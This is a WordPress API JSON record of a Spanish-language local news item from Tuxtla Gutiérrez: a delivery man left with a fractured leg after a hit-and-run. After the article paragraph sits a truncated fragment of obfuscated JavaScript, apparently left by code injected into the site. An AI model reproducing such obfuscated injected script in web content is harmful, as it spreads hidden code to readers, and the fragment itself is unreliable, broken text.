{"id":8931,"date":"2023-03-04T04:45:19","date_gmt":"2023-03-04T04:45:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8931"},"modified":"2023-03-04T04:45:20","modified_gmt":"2023-03-04T04:45:20","slug":"repartidor-resulta-herido-de-gravedad-en-accidente","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8931","title":{"rendered":"Repartidor resulta herido de gravedad en accidente"},"content":{"rendered":"\n<p> <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1677904976217.jpg\" alt=\"\" class=\"wp-image-8932\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1677904976217.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1677904976217-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 3 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Un repartidor de comida result\u00f3 con heridas graves luego de ser embestido por un veh\u00edculo cuando circulaba en la zona Sur de Tuxtla Guti\u00e9rrez.De acuerdo con los reportes de tr\u00e1nsito este accidente ocurri\u00f3 cuando el hombre de unos 35 a\u00f1os de edad circulaba en una Italika de color negro cuando fue embestido por un Mustang de color rojo.Por el fuerte impacto, sali\u00f3 volando y se impact\u00f3 contra el pavimento.Fueron sus compa\u00f1eros de reparto que, llamaron a los n\u00fameros de emergencias.Param\u00e9dicos de la Cruz Roja arribaron al lugar para prestar los servicios prehospitalarios y trasladarlo al hospital G\u00f3mez Maza.En el lugar se detall\u00f3 que present\u00f3 dos fracturas en una pierna.El responsable escap\u00f3 para evadir su responsabilidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 3 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Un repartidor de comida result\u00f3 con heridas graves luego de ser embestido por un veh\u00edculo cuando circulaba en la zona Sur de Tuxtla Guti\u00e9rrez.De acuerdo con los reportes de tr\u00e1nsito este accidente ocurri\u00f3 cuando el hombre de unos 35 a\u00f1os de edad circulaba en una &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8932,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8931","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8931","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8931"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8931\/revisions"}],"predecessor-version":[{"id":8933,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8931\/revisions\/8933"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8932"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8931"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8931"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8931"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}